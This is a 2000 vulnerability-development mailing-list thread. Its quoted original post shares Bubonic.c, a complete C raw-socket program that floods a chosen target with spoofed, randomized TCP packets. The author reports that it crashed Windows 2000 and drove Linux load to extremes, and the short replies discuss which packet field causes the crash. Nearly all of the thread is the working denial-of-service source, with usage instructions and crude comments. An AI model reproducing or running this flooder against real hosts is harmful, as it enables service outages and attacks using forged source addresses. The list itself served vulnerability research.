
Re: Win2k & Linux DoS


From: "J. Oquendo" <intrusion () ENGINEER COM>
Date: Fri, 25 Aug 2000 17:01:20 -0400

Not sure; I'm doing some benchmarking now, since everything was set to send random info, although 0xc9 as the TOS is somehow the culprit.
I'll figure it out soon; I'm doing some more RFC reading right now.

------Original Message------
From: "Marc Maiffret" <marc () eeye com>
To: "J. Oquendo" <intrusion () ENGINEER COM>
Sent: August 25, 2000 11:24:48 AM GMT
Subject: RE: Win2k & Linux DoS


Do you know what the exact packet you sent was to bluescreen the remote
system? Or was it more of a problem with the remote system not being able to
handle the amount of packets?

Signed,
Marc Maiffret
Chief Hacking Officer
eCompany / eEye
T.949.349.9062
F.949.349.9538
http://eEye.com


| -----Original Message-----
| From: VULN-DEV List [mailto:VULN-DEV () SECURITYFOCUS COM]On Behalf Of J.
| Oquendo
| Sent: Friday, August 25, 2000 4:50 PM
| To: VULN-DEV () SECURITYFOCUS COM
| Subject: Win2k & Linux DoS
|
|
| Greetings everyone. While tampering with random codes when
| building a theoretical tool I managed to crash my Windows2000
| laptop by randomizing TCP settings. At first it wasn't a big deal
| since MS has gotten me used to seeing error codes with dumps for
| just about anything.
|
| Seems this code which was in no way specified to attack any
| specific OS brings the load up to extreme levels and is not
| limited to Win2K either.
|
| Written on an Ultra5 running Linux (zoot), I managed to drive the
| load up high after about 3 minutes, forcing the machine to lag drastically.
|
| So in essence I give to you Bubonic.c; maybe someone else can
| benchmark it and figure out what's going on.
|
| Error code received during the WinCrash was:
|
| STOP 0x00000041
| (0x00001000,0x00001279,0x0000042a,0x00000001)
| MUST_SUCCEED_POOL_EMPTY
|
| -------- SNIP TO CODE --------
|
| /*
|
|  * Bubonic.c lame DoS against Windows 2000 machines
|  * and certain versions of Linux (worked against an Ultra5
|  * running Redhat Zoot. Should compile under anything.
|  * Randomly sends TCP packets with random settings, etc.
|
|  * Brings the load up causing the box to crash with
|  * error code:
|
|  * STOP 0x00000041 (0x00001000,0x00001279,0x000042A,0x00000001)
|  * MUST_SUCCEED_POOL_EMPTY
|
|  * CODE RIPPED FROM MY OTHER BGP KILLER WITH SETTINGS TWEAKED.
|  * WEE MULTICODE... www.antioffline.com/daemonic.c
|
|  * shouts... hrmm fsck it why not...
|  * #unixgods on the efnet, jhh, iggie, rajak, speye, obecian,
|  * qwer7y, m3th, god-, tattooman, spikeman, and my wife.
|  * Can't forget security staff all over the place.
|
|  * Logs for the packets sent at www.antioffline.com/logged
|  * Windows2K screen shots at www.antioffline.com/loads.html
|  */
|
|
| #include <stdio.h>
| #include <stdlib.h>
| #include <unistd.h>
| #include <strings.h>
| #include <sys/time.h>
| #include <sys/types.h>
| #include <sys/socket.h>
|
| #ifndef __USE_BSD
| #define __USE_BSD
|
| #endif
|
| #ifndef __FAVOR_BSD
|
| #define __FAVOR_BSD
|
| #endif
|
| #include <netinet/in_systm.h>
| #include <netinet/in.h>
| #include <netinet/ip.h>
| #include <netinet/tcp.h>
| #include <arpa/inet.h>
| #include <netdb.h>
|
| #ifdef LINUX
| #define FIX(x)  htons(x)
|
| #else
|
| #define FIX(x)  (x)
| #endif
|
| struct ip_hdr {
|     u_int       ip_hl:4,
|                 ip_v:4;
|     u_char      ip_tos;
|     u_short     ip_len;
|     u_short     ip_id;
|     u_short     ip_off;
|     u_char      ip_ttl;
|     u_char      ip_p;
|     u_short     ip_sum;
|     u_long      saddr, daddr;
| };
|
| struct tcp_hdr {
|     u_short     th_sport;
|     u_short     th_dport;
|     u_long      th_seq;
|     u_long      th_syn;
|     u_int       th_x2:4,
|                 th_off:4;
|     u_char      th_flags;
|     u_short     th_win;
|     u_short     th_sum;
|     u_short     th_urp;
| };
|
| struct tcpopt_hdr {
|     u_char  type;
|     u_char  len;
|     u_short value;
| };
|
| struct pseudo_hdr {
|     u_long saddr, daddr;
|     u_char mbz, ptcl;
|     u_short tcpl;
| };
|
| struct packet {
|     struct ip/*_hdr*/ ip;
|     struct tcphdr tcp;
| };
|
| struct cksum {
|     struct pseudo_hdr pseudo;
|     struct tcphdr tcp;
| };
|
| struct packet packet;
| struct cksum cksum;
| struct sockaddr_in s_in;
| u_short bgport, bgsize, pps;
| u_long radd;
| u_long sradd;
| int sock;
|
| void usage(char *progname)
| {
|     fprintf(stderr, "Usage: %s <dst> <src> <size> <number>\n", progname);
|     fprintf(stderr, "Ports are set to send and receive on port 179\n");
|     fprintf(stderr, "dst:\tDestination Address\n");
|     fprintf(stderr, "src:\tSource Address\n");
|     fprintf(stderr, "size:\tSize of packet which should be no
| larger than 1024 should allow for xtra header info thru routes\n");
|     fprintf(stderr, "num:\tpackets\n\n");
|     exit(1);
| }
|
| inline u_short in_cksum(u_short *addr, int len)
| {
|     register int nleft = len;
|     register u_short *w = addr;
|     register int sum = 0;
|     u_short answer = 0;
|      while (nleft > 1)  {
|          sum += *w++;
|          nleft -= 2;
|      }
|      if (nleft == 1) {
|          *(u_char *)(&answer) = *(u_char *) w;
|          sum += answer;
|      }
|      sum = (sum >> 16) + (sum & 0xffff);
|      sum += (sum >> 16);
|      answer = ~sum;
|      return(answer);
| }
|
| u_long lookup(char *hostname)
| {
|     struct hostent *hp;
|
|     if ((hp = gethostbyname(hostname)) == NULL) {
|        fprintf(stderr, "Could not resolve %s fucknut\n", hostname);
|        exit(1);
|     }
|
|     return *(u_long *)hp->h_addr;
| }
|
|
| void flooder(void)
| {
|     struct timespec ts;
|     int i;
|
|
|     memset(&packet, 0, sizeof(packet));
|
|     ts.tv_sec                   = 0;
|     ts.tv_nsec                  = 10;
|
|     packet.ip.ip_hl             = 5;
|     packet.ip.ip_v              = 4;
|     packet.ip.ip_p              = IPPROTO_TCP;
|     packet.ip.ip_tos            = rand();
|     packet.ip.ip_id             = radd;
|     packet.ip.ip_len            = FIX(sizeof(packet));
|     packet.ip.ip_off            = 0;
|     packet.ip.ip_ttl            = 255;
|     packet.ip.ip_dst.s_addr     = radd;
|
|     packet.tcp.th_flags         = random();
|     packet.tcp.th_win           = 65535;
|     packet.tcp.th_seq           = random();
|     packet.tcp.th_ack           = 0;
|     packet.tcp.th_off           = 0;
|     packet.tcp.th_urp           = random();
|     packet.tcp.th_dport         = random();
|     cksum.pseudo.daddr          = sradd;
|     cksum.pseudo.mbz            = 0;
|     cksum.pseudo.ptcl           = IPPROTO_TCP;
|     cksum.pseudo.tcpl           = random();
|
|     s_in.sin_family             = AF_INET;
|     s_in.sin_addr.s_addr        = sradd;
|     s_in.sin_port               = packet.tcp.th_dport;
|
|     for(i=0;;++i) {
|     if( !(i&0x3FF) ) {
|         packet.tcp.th_sport = rand();
|         cksum.pseudo.saddr = packet.ip.ip_src.s_addr = sradd;
|         packet.tcp.th_flags = random();
|         packet.tcp.th_ack   = rand();
|
|     }
|     else {
|         packet.tcp.th_flags = rand();
|         packet.tcp.th_ack = rand();
|     }
|        ++packet.ip.ip_id;
|        /*++packet.tcp.th_sport*/;
|        ++packet.tcp.th_seq;
|
|        if (!bgport)
|           s_in.sin_port = packet.tcp.th_dport = rand();
|
|        packet.ip.ip_sum         = 0;
|        packet.tcp.th_sum        = 0;
|
|        cksum.tcp                = packet.tcp;
|
|        packet.ip.ip_sum         = in_cksum((void *)&packet.ip, 20);
|        packet.tcp.th_sum        = in_cksum((void *)&cksum, sizeof(cksum));
|
|        if (sendto(sock, &packet, sizeof(packet), 0, (struct
| sockaddr *)&s_in, sizeof(s_in)) < 0);
|
|     }
| }
|
| int main(int argc, char *argv[])
| {
|     int on = 1;
|
|     printf("Bubonic -- sil () antioffline com\n\n");
|
|     if ((sock = socket(PF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) {
|        perror("socket");
|        exit(1);
|     }
|
|     setgid(getgid()); setuid(getuid());
|
|     if (argc < 4)
|        usage(argv[0]);
|
|     if (setsockopt(sock, IPPROTO_IP, IP_HDRINCL, (char *)&on,
| sizeof(on)) < 0)
|
| {
|        perror("setsockopt");
|        exit(1);
|
|     }
|
|     srand((time(NULL) ^ getpid()) + getppid());
|
|     printf("\nFinding host\n"); fflush(stdout);
|
|     radd        = lookup(argv[1]);
|     bgport      = atoi(argv[3]);
|     bgsize      = atoi(argv[4]);
|     sradd       = lookup(argv[2]);
|     printf("AntiOffline -- Putting the Hero in Heroin\n");
|
|     flooder();
|
|     return 0;
| }
|
| ______________________________________________
| FREE Personalized Email at Mail.com
| Sign up at http://www.mail.com/?sr=signup
|

______________________________________________
FREE Personalized Email at Mail.com
Sign up at http://www.mail.com/?sr=signup

